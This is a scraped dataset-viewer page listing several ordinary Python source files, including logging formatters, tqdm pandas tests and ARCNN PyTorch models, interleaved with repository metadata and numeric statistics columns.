"MIT"
] | null | null | null |
from .search_space import SearchSpace, ParameterSpace, extract_search_space, with_search_space
| 47.5
| 94
| 0.884211
| 12
| 95
| 6.583333
| 0.666667
| 0.417722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073684
| 95
| 1
| 95
| 95
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a7edda09d386e406741daeb3758f0a06937c3d6b
| 756
|
py
|
Python
|
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | 6
|
2019-06-25T20:01:03.000Z
|
2022-03-25T23:15:57.000Z
|
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | null | null | null |
shabanipy/logging/formatters.py
|
ShabaniLab/DataAnalysis
|
e234b7d0e4ff8ecc11e58134e6309a095abcd2c0
|
[
"MIT"
] | 5
|
2019-06-11T17:21:54.000Z
|
2021-08-24T14:45:08.000Z
|
"""Logging formatters."""
from logging import INFO, Formatter
class InformativeFormatter(Formatter):
def format(self, record):
return (
f"[{record.levelname}]".ljust(11)
+ f"{record.filename}:{record.lineno}".ljust(25)
+ " "
+ record.getMessage()
+ (f"\n{self.formatException(record.exc_info)}" if record.exc_info else "")
)
class ConsoleFormatter(Formatter):
def format(self, record):
return (
f"[{record.levelname}]".ljust(11)
+ (f"{record.filename}:{record.lineno} " if record.levelno > INFO else "")
+ record.getMessage()
+ (f"\n{self.formatException(record.exc_info)}" if record.exc_info else "")
)
| 31.5
| 87
| 0.572751
| 78
| 756
| 5.5
| 0.358974
| 0.065268
| 0.121212
| 0.102564
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0.713287
| 0
| 0.010929
| 0.27381
| 756
| 23
| 88
| 32.869565
| 0.770492
| 0.025132
| 0
| 0.555556
| 0
| 0
| 0.259918
| 0.202462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.055556
| 0.111111
| 0.388889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
a7f9061822a84869d4b69d85b59f7876bc1f30bb
| 22
|
py
|
Python
|
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | null | null | null |
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | 2
|
2021-11-25T12:37:48.000Z
|
2021-11-25T12:38:33.000Z
|
read/read/str/readers/db.py
|
vitalfadeev/read
|
f8893daa732d50bb6f1da94e66d016d5611f1983
|
[
"MIT"
] | null | null | null |
from .sqlite3 import *
| 22
| 22
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 0.136364
| 22
| 1
| 22
| 22
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c51aad8f535c36df24d27afde02bee1ac3f489a9
| 32
|
py
|
Python
|
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | 6
|
2021-03-10T16:23:10.000Z
|
2022-01-14T04:57:46.000Z
|
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | null | null | null |
autoscalingsim/deltarepr/node_group_delta/__init__.py
|
Remit/autoscaling-simulator
|
091943c0e9eedf9543e9305682a067ab60f56def
|
[
"MIT"
] | 1
|
2022-01-14T04:57:55.000Z
|
2022-01-14T04:57:55.000Z
|
from .node_group_delta import *
| 16
| 31
| 0.8125
| 5
| 32
| 4.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c560cc8fcd7966f3b469fcf6485f99a87d5623ca
| 135
|
py
|
Python
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-04T23:52:55.000Z
|
2020-09-04T23:52:55.000Z
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-04T23:42:19.000Z
|
2020-09-04T23:42:23.000Z
|
moban/plugins/jinja2/tests/win32.py
|
allegheny-college-cmpsc-481-spring-2020/moban
|
632622d2506606f06aaaf7882523444998d9bd8f
|
[
"MIT"
] | 1
|
2020-09-24T08:34:00.000Z
|
2020-09-24T08:34:00.000Z
|
from os.path import normcase, normpath
def samefile(file1, file2):
return normcase(normpath(file1)) == normcase(normpath(file2))
| 22.5
| 65
| 0.748148
| 17
| 135
| 5.941176
| 0.647059
| 0.475248
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034188
| 0.133333
| 135
| 5
| 66
| 27
| 0.82906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
c569a493de22568e81d46ce6cb27237078079152
| 89
|
py
|
Python
|
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | null | null | null |
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | null | null | null |
3_mfr/some_more.py
|
konflic/python_qa_functional_programming
|
70109dc1a2d9bc775ab6c67b49244454281fa1b4
|
[
"MIT"
] | 2
|
2021-01-24T18:14:48.000Z
|
2021-01-25T16:50:21.000Z
|
print(any([True, 1, ""]))
print(all([True, 1, ""]))
print(dict(zip([1, 2, 3], "abc")))
| 14.833333
| 34
| 0.494382
| 15
| 89
| 2.933333
| 0.666667
| 0.227273
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064935
| 0.134831
| 89
| 5
| 35
| 17.8
| 0.506494
| 0
| 0
| 0
| 0
| 0
| 0.033708
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
c571e9c03ef914e8ea6f2f513d16e384d8d9f63d
| 36
|
py
|
Python
|
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
centrySDK/__init__.py
|
YerkoCuzmar/CentrySDK
|
e32080552e71c40119e4dc8cbaa520f0bf9254e3
|
[
"MIT"
] | null | null | null |
from centrySDK.centry import Centry
| 18
| 35
| 0.861111
| 5
| 36
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.96875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3d7d515c77cf07d3d4851ce261657efca4481102
| 2,814
|
py
|
Python
|
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
PicNumero/tqdm/tests/tests_pandas.py
|
kmiddleton/Pic-Numero
|
69a295d208106c486854473521e8d1fef13a0a24
|
[
"MIT"
] | null | null | null |
from nose.plugins.skip import SkipTest
from tqdm import tqdm
from tests_tqdm import with_setup, pretest, posttest, StringIO, closing
@with_setup(pretest, posttest)
def test_pandas_groupby_apply():
""" Test pandas.DataFrame.groupby(...).progress_apply """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 50, (500, 3)))
dfs = pd.DataFrame(randint(0, 50, (500, 3)),
columns=list('abc'))
tqdm_pandas(tqdm(file=our_file, leave=False, ascii=True))
df.groupby(0).progress_apply(lambda x: None)
tqdm_pandas(tqdm(file=our_file, leave=False, ascii=True))
dfs.groupby(['a']).progress_apply(lambda x: None)
our_file.seek(0)
# don't expect final output since no `leave` and
# high dynamic `miniters`
nexres = '100%|##########|'
if nexres in our_file.read():
our_file.seek(0)
raise AssertionError("\nDid not expect:\n{0}\nIn:{1}\n".format(
nexres, our_file.read()))
@with_setup(pretest, posttest)
def test_pandas_apply():
""" Test pandas.DataFrame[.series].progress_apply """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 50, (500, 3)))
dfs = pd.DataFrame(randint(0, 50, (500, 3)),
columns=list('abc'))
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
df.progress_apply(lambda x: None)
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
dfs.a.progress_apply(lambda x: None)
our_file.seek(0)
if our_file.read().count('100%') < 2:
our_file.seek(0)
raise AssertionError("\nExpected:\n{0}\nIn:{1}\n".format(
'100% at least twice', our_file.read()))
@with_setup(pretest, posttest)
def test_pandas_leave():
""" Test pandas with `leave=True` """
try:
from numpy.random import randint
from tqdm import tqdm_pandas
import pandas as pd
except:
raise SkipTest
with closing(StringIO()) as our_file:
df = pd.DataFrame(randint(0, 100, (1000, 6)))
tqdm_pandas(tqdm(file=our_file, leave=True, ascii=True))
df.groupby(0).progress_apply(lambda x: None)
our_file.seek(0)
exres = '100%|##########| 101/101'
if exres not in our_file.read():
our_file.seek(0)
raise AssertionError("\nExpected:\n{0}\nIn:{1}\n".format(
exres, our_file.read()))
| 32.72093
| 75
| 0.599147
| 373
| 2,814
| 4.394102
| 0.22252
| 0.085418
| 0.040268
| 0.043929
| 0.75961
| 0.75961
| 0.751678
| 0.729103
| 0.729103
| 0.721782
| 0
| 0.033981
| 0.267946
| 2,814
| 85
| 76
| 33.105882
| 0.76165
| 0.071073
| 0
| 0.703125
| 0
| 0
| 0.059368
| 0.028527
| 0
| 0
| 0
| 0
| 0.046875
| 1
| 0.046875
| false
| 0
| 0.1875
| 0
| 0.234375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d7df5f54664de3b6ddaca1a454fb0fb068dab5a
| 1,635
|
py
|
Python
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 21
|
2020-12-05T14:14:07.000Z
|
2022-03-04T17:35:36.000Z
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 2
|
2020-11-02T11:55:36.000Z
|
2021-01-29T04:50:10.000Z
|
src/nets/arcnn.py
|
VDIGPKU/QGCN
|
657afb8977721f65ef2bae7c2333a93a3315dab1
|
[
"MIT"
] | 7
|
2021-02-21T05:11:38.000Z
|
2022-03-20T01:07:03.000Z
|
from torch import nn
class ARCNN(nn.Module):
def __init__(self, n_colors=3):
super(ARCNN, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(n_colors, 64, kernel_size=9, padding=4),
nn.PReLU(),
nn.Conv2d(64, 32, kernel_size=7, padding=3),
nn.PReLU(),
nn.Conv2d(32, 16, kernel_size=1),
nn.PReLU()
)
self.last = nn.Conv2d(16, n_colors, kernel_size=5, padding=2)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.001)
def forward(self, x):
x = self.base(x)
x = self.last(x)
return x
class FastARCNN(nn.Module):
def __init__(self, n_colors=3):
super(FastARCNN, self).__init__()
self.base = nn.Sequential(
nn.Conv2d(n_colors, 64, kernel_size=9, stride=2, padding=4),
nn.PReLU(),
nn.Conv2d(64, 32, kernel_size=1),
nn.PReLU(),
nn.Conv2d(32, 32, kernel_size=7, padding=3),
nn.PReLU(),
nn.Conv2d(32, 64, kernel_size=1),
nn.PReLU()
)
self.last = nn.ConvTranspose2d(64, n_colors, kernel_size=9, stride=2, padding=4, output_padding=1)
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight, std=0.001)
def forward(self, x):
x = self.base(x)
x = self.last(x)
return x
| 29.727273
| 106
| 0.548012
| 222
| 1,635
| 3.846847
| 0.22973
| 0.093677
| 0.052693
| 0.087822
| 0.846604
| 0.825527
| 0.825527
| 0.786885
| 0.721311
| 0.64637
| 0
| 0.06009
| 0.318043
| 1,635
| 54
| 107
| 30.277778
| 0.70583
| 0
| 0
| 0.644444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.022222
| 0
| 0.244444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.